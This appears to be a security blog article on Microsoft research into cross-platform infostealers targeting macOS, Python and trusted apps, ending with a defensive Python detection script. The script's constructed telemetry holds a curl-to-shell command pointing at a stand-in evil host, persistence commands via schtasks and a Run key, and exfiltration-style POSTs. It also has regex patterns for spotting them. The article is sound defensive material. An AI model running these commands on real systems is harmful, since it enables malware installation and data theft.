Microsoft Warns of “Infostealers Without Borders” as Cross-Platform Malware Targets macOS, Python Apps, and Trusted Platforms

In the ever-shifting landscape of cyber threats, one class of malware continues to grow in sophistication and reach: infostealers, malicious programs designed to harvest credentials, secrets, and other sensitive data from compromised systems. Historically focused on Windows machines, these threats have expanded dramatically: they increasingly target macOS, are written in flexible scripting languages such as Python, and even abuse trusted applications and services as stealthy delivery channels.

Security researchers from Microsoft Defender Experts have been tracking this evolution throughout late 2025 and into 2026, revealing a multifaceted threat ecosystem where attackers are combining social engineering, cross-platform code, and deceptive distribution to exfiltrate valuable information at scale.


1. macOS No Longer Immune: Fake Apps and ClickFix Tricks

Despite popular belief that macOS is less prone to malware than Windows, attackers are now heavily targeting Apple systems through deceptive fronts. One common vector involves convincing users to download malicious software from untrusted sites or to execute commands pasted directly into the Terminal — often under the guise of “fixing” a browser problem or installing a helpful utility.

These so-called “ClickFix-style” scams rely on social engineering to get users to bypass built-in protections themselves and run code that installs an infostealer. Researchers have identified at least three major macOS stealer families:

  • DigitStealer — often bundled with fake “DynamicLake” installers.
  • MacSync — pushed through copied Terminal commands.
  • Atomic macOS Stealer (AMOS) — distributed via bogus AI tool installers.

Once deployed, these threats harvest browser passwords, saved keys, cryptocurrency wallet data, cloud credentials, and even development secrets — sending everything back to an attacker-controlled server, then erasing themselves to reduce the chance of detection.

The impact is broad: compromised credentials can lead to account takeover (including banking and corporate cloud systems), stolen wallets can mean immediate financial loss, and exposed developer secrets can open doors to source code, infrastructure, and customer data.


2. Python Stealers: Rapid, Adaptable, Cross-Platform Threats

Another worrying trend is the rise of Python-based infostealers. Unlike traditional compiled malware, Python stealers are lightweight, easily modified, and can run on multiple operating systems — making them attractive to novice and experienced threat actors alike.

Microsoft’s telemetry shows several campaigns delivering Python stealers via phishing emails, often mimicking legitimate organizational communication to trick recipients into opening attachments or links. Once executed, these stealers collect:

  • Login credentials and session cookies
  • Authentication tokens
  • Credit card and financial info
  • Cryptocurrency wallet details

One prominent example is PXA Stealer, linked to Vietnamese-language actors that targeted government and educational organizations in 2025. These campaigns used phishing to gain a foothold, established persistence through registry Run keys or scheduled tasks, downloaded additional payloads, and exfiltrated data through legitimate services such as Telegram so that the traffic blended in with normal use.

Because the malicious logic lives in easily rewritten script files executed by a legitimate interpreter (often packed into a standalone executable), signature-based antivirus alone is a poor fit for these threats, which is why organizations must combine phishing defenses, endpoint behavior monitoring, and strict execution controls.


3. Abusing Trusted Platforms: WhatsApp and PDF Tools as Malware Carriers

A particularly insidious shift in attacker tactics involves leveraging widely-used applications as malware distribution platforms. Instead of setting up malicious infrastructure that might be blocked or flagged, adversaries now piggyback on platforms users trust.

For example, researchers saw a campaign that abused WhatsApp to spread malware. This multi-stage attack began with an obfuscated Visual Basic script that launched PowerShell to fetch additional payloads. One of those payloads used the WPPConnect automation tool to hijack the victim’s WhatsApp account and send malicious attachments to their contacts, propagating almost like a worm.

Another tactic involved a malicious PDF editor installer (“Crystal PDF”) advertised through search engine ads. Once installed, it persisted via scheduled tasks and covertly harvested browser data — including cookies, session information, and credentials — and exfiltrated this data back to attackers.

These tactics illustrate a disturbing trend: threats are no longer confined to obscure attachments or suspicious executables — instead they hide within tools and channels people use every day.


4. What Organizations Can Do: Mitigation and Detection

So, how should defenders respond? Microsoft’s research underscores a layered approach built around awareness, monitoring, and hardened defenses:

  • Educate users about social engineering, especially scams that ask them to install software or paste commands into consoles.
  • Restrict installation of unverified macOS binaries and scripts.
  • Monitor for suspicious processes — especially unusual Terminal activity or Python interpreters masquerading under trusted names.
  • Inspect outbound traffic for signs of data exfiltration, such as POST requests to unknown domains.
  • Harden endpoint defenses by enabling cloud-based protections, running Endpoint Detection and Response (EDR) in block mode, and preventing unauthorized script execution.
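The following script is an added example, not code from Microsoft’s research or from the original article. It applies toy versions of the monitoring points above (pasted curl-to-shell commands launched from Terminal, a Python interpreter hiding behind a trusted process name, scheduled-task and Run-key persistence, and POST traffic to domains outside an allowlist) to a handful of constructed telemetry lines, then correlates the hits per host. The event schema, field names (`original_name` stands in for a PE OriginalFileName-style field as Sysmon reports it), domain allowlist, and all hosts, paths and domains are assumptions for illustration.

```python
"""Toy behavioural detection pass for infostealer activity (added example).

Reads JSON-lines endpoint telemetry in a hypothetical schema and emits alerts
for the behaviours the mitigation list calls out. Sample events are constructed.
"""
import json
import re
from typing import Iterable

# Assumption: the organisation maintains an allowlist of expected POST targets.
KNOWN_DOMAINS = {"login.microsoftonline.com", "update.example.org"}

# Interpreter binaries, and the names an attacker may rename them to.
INTERPRETERS = {"python.exe", "pythonw.exe", "python3", "python"}

# Processes a user pastes commands into; a ClickFix lure ends up here.
TERMINALS = {"Terminal", "iTerm2", "osascript"}

# Shape of a pasted one-liner: download piped straight into a shell, or a
# base64 blob decoded into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b")
B64_TO_SHELL = re.compile(r"base64\s+(-d|--decode).*\|\s*(sh|bash|zsh)\b")

# Windows persistence primitives the PXA Stealer write-up mentions.
PERSIST_TASK = re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I)
PERSIST_RUNKEY = re.compile(r"\breg(\.exe)?\s+add\b.*currentversion\\run\b", re.I)

# Constructed sample telemetry (not real data). Raw string so the JSON
# backslash escapes survive untouched.
SAMPLE_EVENTS = r"""
{"type":"process","host":"mac-01","parent":"Terminal","name":"bash","original_name":"bash","cmd":"bash -c 'curl -fsSL http://fix.evil.example/r.sh | sh'"}
{"type":"process","host":"mac-01","parent":"Finder","name":"Safari","original_name":"Safari","cmd":"Safari"}
{"type":"process","host":"win-07","parent":"outlook.exe","name":"svchost.exe","original_name":"python.exe","cmd":"svchost.exe stealer.py"}
{"type":"process","host":"win-07","parent":"svchost.exe","name":"schtasks.exe","original_name":"schtasks.exe","cmd":"schtasks /create /sc onlogon /tn Updater /tr C:\\Users\\u\\AppData\\Local\\svchost.exe"}
{"type":"process","host":"win-07","parent":"svchost.exe","name":"reg.exe","original_name":"reg.exe","cmd":"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /d C:\\Users\\u\\AppData\\Local\\svchost.exe"}
{"type":"network","host":"win-07","process":"svchost.exe","method":"POST","dest":"api.telegram.org","bytes":184320}
{"type":"network","host":"win-07","process":"outlook.exe","method":"POST","dest":"login.microsoftonline.com","bytes":2048}
{"type":"network","host":"mac-01","process":"curl","method":"POST","dest":"drop.evil.example","bytes":512000}
"""


def _alert(ev: dict, rule: str) -> dict:
    """Build a minimal alert record from an event and the rule it tripped."""
    return {"rule": rule, "host": ev["host"], "detail": ev.get("cmd") or ev.get("dest")}


def detect(lines: Iterable[str]) -> list[dict]:
    """Run every rule over each telemetry line; one event may raise several alerts."""
    alerts: list[dict] = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        if ev["type"] == "process":
            cmd = ev.get("cmd", "")
            # ClickFix: a terminal-spawned shell that pipes a download into sh.
            if ev.get("parent") in TERMINALS and (PIPE_TO_SHELL.search(cmd) or B64_TO_SHELL.search(cmd)):
                alerts.append(_alert(ev, "clickfix_paste"))
            # The binary is a Python interpreter but runs under another name.
            if ev.get("original_name") in INTERPRETERS and ev.get("name") not in INTERPRETERS:
                alerts.append(_alert(ev, "masquerading_interpreter"))
            # Scheduled task or Run key creation.
            if PERSIST_TASK.search(cmd) or PERSIST_RUNKEY.search(cmd):
                alerts.append(_alert(ev, "persistence"))
        elif ev["type"] == "network":
            # Outbound POST to anything outside the allowlist is worth a look.
            if ev.get("method") == "POST" and ev.get("dest") not in KNOWN_DOMAINS:
                alerts.append(_alert(ev, "post_to_unknown_domain"))
    return alerts


def correlate(alerts: list[dict], min_rules: int = 2) -> set[str]:
    """Hosts on which at least `min_rules` distinct rules fired: a single POST to
    an unlisted domain is noise, but paired with persistence or a pasted
    download it looks like a stealer chain."""
    by_host: dict[str, set[str]] = {}
    for a in alerts:
        by_host.setdefault(a["host"], set()).add(a["rule"])
    return {host for host, rules in by_host.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS.splitlines())
    for a in found:
        print(f"{a['host']:7} {a['rule']:26} {a['detail']}")
    print("hosts with correlated activity:", sorted(correlate(found)))
```

The allowlist rule is deliberately blunt; in practice it is the correlation step that keeps it useful, since a POST to an unknown domain is far more interesting on a host that also just created a Run key or ran a pasted curl-to-shell command than on its own.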

In environments that support it, advanced tools like Microsoft Defender XDR can correlate endpoint, identity, and network events — making it easier to spot subtle attacker behavior such as living-off-the-land abuse, lateral movement, or Python-driven exfiltration.


Closing Thoughts

Infostealers have moved beyond Windows executables and now span platforms, languages, and even everyday applications. By blending into legitimate ecosystems and taking advantage of user trust, these threats pose significant risks to individuals and organizations alike.

The key takeaway: Assume attackers will target every platform and avenue available — from macOS systems to Python scripts and trusted communication tools. Equally, defenders must deploy defenses that are as dynamic and adaptive as the threats themselves.